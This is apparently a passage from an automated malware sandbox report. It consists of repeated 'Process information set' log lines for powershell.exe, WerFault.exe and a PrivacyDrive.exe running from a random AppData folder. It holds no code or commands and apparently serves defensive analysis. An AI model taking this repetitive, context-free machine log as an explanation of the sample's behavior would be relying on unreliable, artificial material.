    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
